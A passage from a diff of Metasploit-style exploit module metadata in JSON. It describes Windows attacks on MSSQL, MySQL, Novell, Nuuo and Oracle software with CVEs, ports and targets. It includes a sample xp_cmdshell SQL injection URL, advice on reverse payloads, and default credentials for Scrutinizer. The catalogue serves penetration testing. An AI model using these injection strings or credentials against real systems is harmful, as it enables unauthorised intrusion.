exploit/multi/handler to run in the background as a job to support multiple incoming\n shells.\n\n If you are interested in deploying payloads to specific servers this module also\n supports that functionality via the \"DEPLOYLIST\" option.\n\n Currently, the module is capable of 
delivering payloads to both 32bit and 64bit\n Windows systems via powershell memory injection methods based on Matthew Graeber's\n work. As a result, the target server must have powershell installed. By default,\n all of the crawl information is saved to a CSV formatted log file and MSF loot so\n that the tool can also be used for auditing without deploying payloads.", + "references": [ + "URL-http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012", + "URL-http://msdn.microsoft.com/en-us/library/ms188279.aspx", + "URL-http://www.exploit-monday.com/2011_10_16_archive.html" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2024-02-19 10:57:53 +0000", + "path": "/modules/exploits/windows/mssql/mssql_linkcrawler.rb", + "is_install_path": true, + "ref_name": "windows/mssql/mssql_linkcrawler", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mssql/mssql_payload": { + "name": "Microsoft SQL Server Payload Execution", + "fullname": "exploit/windows/mssql/mssql_payload", + "aliases": [], + "rank": 600, + "disclosure_date": "2000-05-30", + "type": "exploit", + "author": [ + "David Kennedy \"ReL1K\" ", + "jduck " + ], + "description": "This module executes an arbitrary payload on a Microsoft SQL Server by using\n the \"xp_cmdshell\" stored procedure. Currently, three delivery methods are supported.\n\n First, the original method uses Windows 'debug.com'. File size restrictions are\n avoided by incorporating the debug bypass method presented by SecureStat at\n Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.\n\n A second method takes advantage of the Command Stager subsystem. 
This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n payload on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.", + "references": [ + "CVE-2000-0402", + "OSVDB-557", + "BID-1281", + "CVE-2000-1209", + "OSVDB-15757", + "BID-4797" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2025-03-03 19:20:56 +0000", + "path": "/modules/exploits/windows/mssql/mssql_payload.rb", + "is_install_path": true, + "ref_name": "windows/mssql/mssql_payload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/mssql/mssql_payload_sqli": { + "name": "Microsoft SQL Server Payload Execution via SQL Injection", + "fullname": "exploit/windows/mssql/mssql_payload_sqli", + "aliases": [], + "rank": 600, + "disclosure_date": "2000-05-30", + "type": "exploit", + "author": [ + "David Kennedy \"ReL1K\" ", + "jduck ", + "Rodrigo Marcos" + ], + "description": "This module will execute an arbitrary payload on a Microsoft SQL\n Server, using a SQL injection vulnerability.\n\n Once a vulnerability is identified this module\n will use xp_cmdshell to upload and execute Metasploit payloads.\n It is necessary to specify the exact point where the SQL injection\n vulnerability happens. 
For example, given the following injection:\n\n http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical\n\n you would need to set the following path:\n set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar\n\n In regard to the payload, unless there is a closed port in the web server,\n you dont want to use any \"bind\" payload, specially on port 80, as you will\n stop reaching the vulnerable web server host. You want a \"reverse\" payload, probably to\n your port 80 or to any other outbound port allowed on the firewall.\n For privileged ports execute Metasploit msfconsole as root.\n\n Currently, three delivery methods are supported.\n\n First, the original method uses Windows 'debug.com'. File size restrictions are\n avoided by incorporating the debug bypass method presented by SecureStat at\n Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.\n\n A second method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. 
By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n payload on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.", + "references": [ + "CVE-2000-0402", + "OSVDB-557", + "BID-1281", + "CVE-2000-1209", + "OSVDB-15757", + "BID-4797", + "URL-http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/mssql/mssql_payload_sqli.rb", + "is_install_path": true, + "ref_name": "windows/mssql/mssql_payload_sqli", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mysql/mysql_mof": { + "name": "Oracle MySQL for Microsoft Windows MOF Execution", + "fullname": "exploit/windows/mysql/mysql_mof", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-12-01", + "type": "exploit", + "author": [ + "kingcope", + "sinn3r " + ], + "description": "This module takes advantage of a file privilege misconfiguration problem\n specifically against Windows MySQL servers (due to the use of a .mof file).\n This may result in arbitrary code execution under the context of SYSTEM.\n This module requires a valid MySQL account on the target machine.", + "references": [ + "CVE-2012-5613", + "OSVDB-88118", + "EDB-23083", + "URL-https://seclists.org/fulldisclosure/2012/Dec/13" + ], + "platform": "Windows", + "arch": "", + "rport": 3306, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MySQL on Windows prior to Vista" + ], + 
"mod_time": "2024-02-28 17:18:43 +0000", + "path": "/modules/exploits/windows/mysql/mysql_mof.rb", + "is_install_path": true, + "ref_name": "windows/mysql/mysql_mof", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": [ + "mysql" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/mysql/mysql_start_up": { + "name": "Oracle MySQL for Microsoft Windows FILE Privilege Abuse", + "fullname": "exploit/windows/mysql/mysql_start_up", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-12-01", + "type": "exploit", + "author": [ + "sinn3r ", + "Sean Verity " + ], + "description": "This module takes advantage of a file privilege misconfiguration problem\n specifically against Windows MySQL servers. This module abuses the FILE\n privilege to write a payload to Microsoft's All Users Start Up directory\n which will execute every time a user logs in. The default All Users Start\n Up directory used by the module is present on Windows 7.", + "references": [ + "CVE-2012-5613", + "OSVDB-88118", + "EDB-23083", + "URL-https://seclists.org/fulldisclosure/2012/Dec/13" + ], + "platform": "Windows", + "arch": "", + "rport": 3306, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MySQL on Windows" + ], + "mod_time": "2024-02-28 17:18:43 +0000", + "path": "/modules/exploits/windows/mysql/mysql_start_up.rb", + "is_install_path": true, + "ref_name": "windows/mysql/mysql_start_up", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": [ + "mysql" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/mysql/mysql_yassl_hello": { + "name": "MySQL yaSSL SSL Hello Message Buffer Overflow", + "fullname": "exploit/windows/mysql/mysql_yassl_hello", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-01-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the yaSSL 
(1.7.5 and earlier)\n implementation bundled with MySQL <= 6.0. By sending a specially crafted\n Hello packet, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-0226", + "OSVDB-41195", + "BID-27140" + ], + "platform": "Windows", + "arch": "", + "rport": 3306, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MySQL 5.0.45-community-nt", + "MySQL 5.1.22-rc-community" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/mysql/mysql_yassl_hello.rb", + "is_install_path": true, + "ref_name": "windows/mysql/mysql_yassl_hello", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/mysql/scrutinizer_upload_exec": { + "name": "Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential", + "fullname": "exploit/windows/mysql/scrutinizer_upload_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-07-27", + "type": "exploit", + "author": [ + "MC ", + "Jonathan Claudius", + "Tanya Secker", + "sinn3r " + ], + "description": "This exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer.\n By default, the software installs a default password in MySQL, and binds the\n service to \"0.0.0.0\". This allows any remote user to login to MySQL, and then\n gain arbitrary remote code execution under the context of 'SYSTEM'. 
Examples\n of default credentials include: 'scrutinizer:admin', and 'scrutremote:admin'.", + "references": [ + "CVE-2012-3951", + "OSVDB-84317", + "URL-http://web.archive.org/web/20140722224651/http://secunia.com/advisories/50074/", + "URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Scrutinizer NetFlow and sFlow Analyzer 9.5.2 or older" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb", + "is_install_path": true, + "ref_name": "windows/mysql/scrutinizer_upload_exec", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/nfs/xlink_nfsd": { + "name": "Omni-NFS Server Buffer Overflow", + "fullname": "exploit/windows/nfs/xlink_nfsd", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-11-06", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Xlink Omni-NFS Server 5.2\n When sending a specially crafted nfs packet, an attacker may be able\n to execute arbitrary code.", + "references": [ + "CVE-2006-5780", + "OSVDB-30224", + "BID-20941", + "URL-http://www.securityfocus.com/data/vulnerabilities/exploits/omni-nfs-server-5.2-stackoverflow.pm" + ], + "platform": "Windows", + "arch": "", + "rport": 2049, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/nfs/xlink_nfsd.rb", + "is_install_path": true, + "ref_name": "windows/nfs/xlink_nfsd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": null + }, + "exploit_windows/nimsoft/nimcontroller_bof": { + "name": "CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow", + "fullname": "exploit/windows/nimsoft/nimcontroller_bof", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-02-05", + "type": "exploit", + "author": [ + "wetw0rk" + ], + "description": "This module exploits a buffer overflow within the CA Unified Infrastructure Management nimcontroller.\n The vulnerability occurs in the robot (controller) component when sending a specially crafted directory_list\n probe.\n\n Technically speaking the target host must also be vulnerable to CVE-2020-8010 in order to reach the\n directory_list probe.", + "references": [ + "CVE-2020-8010", + "CVE-2020-8012", + "URL-https://support.broadcom.com/external/content/release-announcements/CA20200205-01-Security-Notice-for-CA-Unified-Infrastructure-Management/7832", + "PACKETSTORM-156577" + ], + "platform": "Windows", + "arch": "x64", + "rport": 48000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal (x64) - v7.80.3132" + ], + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/exploits/windows/nimsoft/nimcontroller_bof.rb", + "is_install_path": true, + "ref_name": "windows/nimsoft/nimcontroller_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/nntp/ms05_030_nntp": { + "name": "MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow", + "fullname": "exploit/windows/nntp/ms05_030_nntp", + "aliases": [], + "rank": 300, + "disclosure_date": "2005-06-14", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the news reader of Microsoft\n Outlook Express.", + "references": [ + 
"CVE-2005-1213", + "OSVDB-17306", + "BID-13951", + "MSB-MS05-030" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 English SP0-SP4", + "Windows XP English SP0/SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/nntp/ms05_030_nntp.rb", + "is_install_path": true, + "ref_name": "windows/nntp/ms05_030_nntp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/novell/file_reporter_fsfui_upload": { + "name": "NFR Agent FSFUI Record File Upload RCE", + "fullname": "exploit/windows/novell/file_reporter_fsfui_upload", + "aliases": [], + "rank": 500, + "disclosure_date": "2012-11-16", + "type": "exploit", + "author": [ + "juan vazquez " + ], + "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload\n arbitrary files via a directory traversal while handling requests to /FSF/CMD with\n FSFUI records with UICMD 130. 
This module has been tested successfully against NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).", + "references": [ + "CVE-2012-4959", + "OSVDB-87573", + "URL-https://www.rapid7.com/blog/post/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959" + ], + "platform": "Windows", + "arch": "", + "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb", + "is_install_path": true, + "ref_name": "windows/novell/file_reporter_fsfui_upload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/novell/groupwisemessenger_client": { + "name": "Novell GroupWise Messenger Client Buffer Overflow", + "fullname": "exploit/windows/novell/groupwisemessenger_client", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-07-02", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell's GroupWise Messenger Client.\n By sending a specially crafted HTTP response, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2008-2703", + "OSVDB-46041", + "BID-29602", + "URL-http://www.infobyte.com.ar/adv/ISR-17.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Novell GroupWise Messenger 2.0 Client", + "Novell GroupWise Messenger 1.0 Client" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/novell/groupwisemessenger_client.rb", + "is_install_path": true, + "ref_name": "windows/novell/groupwisemessenger_client", + "check": false, + "post_auth": false, + "default_credential": 
false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/novell/netiq_pum_eval": { + "name": "NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution", + "fullname": "exploit/windows/novell/netiq_pum_eval", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-11-15", + "type": "exploit", + "author": [ + "rgod", + "juan vazquez " + ], + "description": "This module abuses a lack of authorization in the NetIQ Privileged User Manager\n service (unifid.exe) to execute arbitrary perl code. The problem exists in the\n ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over\n Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.", + "references": [ + "CVE-2012-5932", + "OSVDB-87334", + "BID-56539", + "EDB-22738" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1" + ], + "mod_time": "2022-03-11 12:22:27 +0000", + "path": "/modules/exploits/windows/novell/netiq_pum_eval.rb", + "is_install_path": true, + "ref_name": "windows/novell/netiq_pum_eval", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/novell/nmap_stor": { + "name": "Novell NetMail NMAP STOR Buffer Overflow", + "fullname": "exploit/windows/novell/nmap_stor", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-12-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR\n verb. 
By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", + "references": [ + "CVE-2006-6424", + "OSVDB-31363", + "BID-21725" + ], + "platform": "Windows", + "arch": "", + "rport": 689, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/novell/nmap_stor.rb", + "is_install_path": true, + "ref_name": "windows/novell/nmap_stor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/novell/zenworks_desktop_agent": { + "name": "Novell ZENworks 6.5 Desktop/Server Management Overflow", + "fullname": "exploit/windows/novell/zenworks_desktop_agent", + "aliases": [], + "rank": 400, + "disclosure_date": "2005-05-19", + "type": "exploit", + "author": [ + "Unknown" + ], + "description": "This module exploits a heap overflow in the Novell ZENworks\n Desktop Management agent. 
This vulnerability was discovered\n by Alex Wheeler.", + "references": [ + "CVE-2005-1543", + "OSVDB-16698", + "BID-13678" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/novell/zenworks_desktop_agent.rb", + "is_install_path": true, + "ref_name": "windows/novell/zenworks_desktop_agent", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/novell/zenworks_preboot_op21_bof": { + "name": "Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow", + "fullname": "exploit/windows/novell/zenworks_preboot_op21_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-03-30", + "type": "exploit", + "author": [ + "Stephen Fewer", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management 10 SP2. The vulnerability exists in the Preboot service and can be\n triggered by sending a specially crafted packet with the opcode 0x21\n (PROXY_CMD_FTP_FILE) to port 998/TCP. 
The module has been successfully tested on\n Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2\n (DEP bypass).", + "references": [ + "CVE-2012-2215", + "OSVDB-65361", + "BID-40486", + "ZDI-10-090", + "URL-http://www.novell.com/support/kb/doc.php?id=7005572" + ], + "platform": "Windows", + "arch": "", + "rport": 998, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb", + "is_install_path": true, + "ref_name": "windows/novell/zenworks_preboot_op21_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/novell/zenworks_preboot_op4c_bof": { + "name": "Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow", + "fullname": "exploit/windows/novell/zenworks_preboot_op4c_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-02-22", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management. The vulnerability exists in the Preboot service and can be triggered\n by sending a specially crafted packet with the opcode 0x4c\n (PROXY_CMD_PREBOOT_TASK_INFO2) to port 998/TCP. 
The module has been successfully\n tested on Novell ZENworks Configuration Management 10 SP2 / SP3 and Windows Server\n 2003 SP2 (DEP bypass).", + "references": [ + "CVE-2011-3176", + "OSVDB-80231", + "BID-52659", + "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=974" + ], + "platform": "Windows", + "arch": "", + "rport": 998, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2", + "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb", + "is_install_path": true, + "ref_name": "windows/novell/zenworks_preboot_op4c_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/novell/zenworks_preboot_op6_bof": { + "name": "Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow", + "fullname": "exploit/windows/novell/zenworks_preboot_op6_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-03-30", + "type": "exploit", + "author": [ + "Stephen Fewer", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management 10 SP2. The vulnerability exists in the Preboot service and can be\n triggered by sending a specially crafted packet with the opcode 0x06\n (PROXY_CMD_CLEAR_WS) to the 998/TCP port. 
The module has been successfully tested\n on Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2\n (DEP bypass).", + "references": [ + "OSVDB-65361", + "BID-40486", + "ZDI-10-090", + "URL-http://www.novell.com/support/kb/doc.php?id=7005572" + ], + "platform": "Windows", + "arch": "", + "rport": 998, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb", + "is_install_path": true, + "ref_name": "windows/novell/zenworks_preboot_op6_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/novell/zenworks_preboot_op6c_bof": { + "name": "Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow", + "fullname": "exploit/windows/novell/zenworks_preboot_op6c_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-02-22", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management. The vulnerability exists in the Preboot service and can be triggered by\n sending a specially crafted packet with the opcode 0x6c (PROXY_CMD_GET_NEXT_STEP)\n to port 998/TCP. 
The module has been successfully tested on Novell ZENworks\n Configuration Management 10 SP2 / SP3 and Windows Server 2003 SP2 (DEP bypass).", + "references": [ + "CVE-2011-3175", + "OSVDB-80231", + "BID-52659", + "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=973" + ], + "platform": "Windows", + "arch": "", + "rport": 998, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2", + "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb", + "is_install_path": true, + "ref_name": "windows/novell/zenworks_preboot_op6c_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/nuuo/nuuo_cms_fu": { + "name": "Nuuo Central Management Server Authenticated Arbitrary File Upload", + "fullname": "exploit/windows/nuuo/nuuo_cms_fu", + "aliases": [], + "rank": 0, + "disclosure_date": "2018-10-11", + "type": "exploit", + "author": [ + "Pedro Ribeiro " + ], + "description": "The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the\n CMS Server.\n The vulnerability is in the \"FileName\" parameter, which accepts directory traversal (..\\..\\)\n characters. 
Therefore, this function can be abused to overwrite any files in the installation\n drive of CMS Server.\n\n This vulnerability is exploitable in CMS versions up to and including v2.4.\n\n This module will either use a provided session number (which can be guessed with an auxiliary\n module) or attempt to login using a provided username and password - it will also try the\n default credentials if nothing is provided.\n\n This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module\n fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will\n not execute successfully.", + "references": [ + "CVE-2018-17936", + "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02", + "URL-https://seclists.org/fulldisclosure/2019/Jan/51", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 5180, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Nuuo Central Management Server <= v2.4.0" + ], + "mod_time": "2022-01-13 18:54:56 +0000", + "path": "/modules/exploits/windows/nuuo/nuuo_cms_fu.rb", + "is_install_path": true, + "ref_name": "windows/nuuo/nuuo_cms_fu", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/nuuo/nuuo_cms_sqli": { + "name": "Nuuo Central Management Authenticated SQL Server SQLi", + "fullname": "exploit/windows/nuuo/nuuo_cms_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-10-11", + "type": "exploit", + "author": [ + "Pedro Ribeiro " + ], + "description": "The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.\n This functionality can be abused to inject SQL into the query. 
As SQL Server 2005 Express is\n installed by default, xp_cmdshell can be enabled and abused to achieve code execution.\n This module will either use a provided session number (which can be guessed with an auxiliary\n module) or attempt to login using a provided username and password - it will also try the\n default credentials if nothing is provided.", + "references": [ + "CVE-2018-18982", + "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02", + "URL-https://seclists.org/fulldisclosure/2019/Jan/51", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 5180, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Nuuo Central Management Server <= v2.10.0" + ], + "mod_time": "2022-01-13 18:54:56 +0000", + "path": "/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb", + "is_install_path": true, + "ref_name": "windows/nuuo/nuuo_cms_sqli", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/oracle/client_system_analyzer_upload": { + "name": "Oracle Database Client System Analyzer Arbitrary File Upload", + "fullname": "exploit/windows/oracle/client_system_analyzer_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-01-18", + "type": "exploit", + "author": [ + "1c239c43f521145fa8385d64a9c32243", + "juan vazquez " + ], + "description": "This module exploits an arbitrary file upload vulnerability on the Client\n Analyzer component as included in Oracle Database 11g, which allows remote\n attackers to upload and execute arbitrary code. 
This module has been tested\n successfully on Oracle Database 11g 11.2.0.1.0 on Windows 2003 SP2, where execution\n through the Windows Management Instrumentation service has been used.", + "references": [ + "CVE-2010-3600", + "OSVDB-70546", + "BID-45883", + "ZDI-11-018", + "URL-http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html" + ], + "platform": "Windows", + "arch": "", + "rport": 1158, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Oracle Oracle11g 11.2.0.1.0 / Windows 2003 SP2" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/oracle/client_system_analyzer_upload.rb", + "is_install_path": true, + "ref_name": "windows/oracle/client_system_analyzer_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/oracle/extjob": { + "name": "Oracle Job Scheduler Named Pipe Command Execution", + "fullname": "exploit/windows/oracle/extjob", + "aliases": [], + "rank": 600, + "disclosure_date": "2007-01-01", + "type": "exploit", + "author": [ + "David Litchfield", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job\n Scheduler is implemented via the component extjob.exe which listens on a named pipe\n called \"orcljsex\" and execute arbitrary commands received over this channel via\n CreateProcess(). 
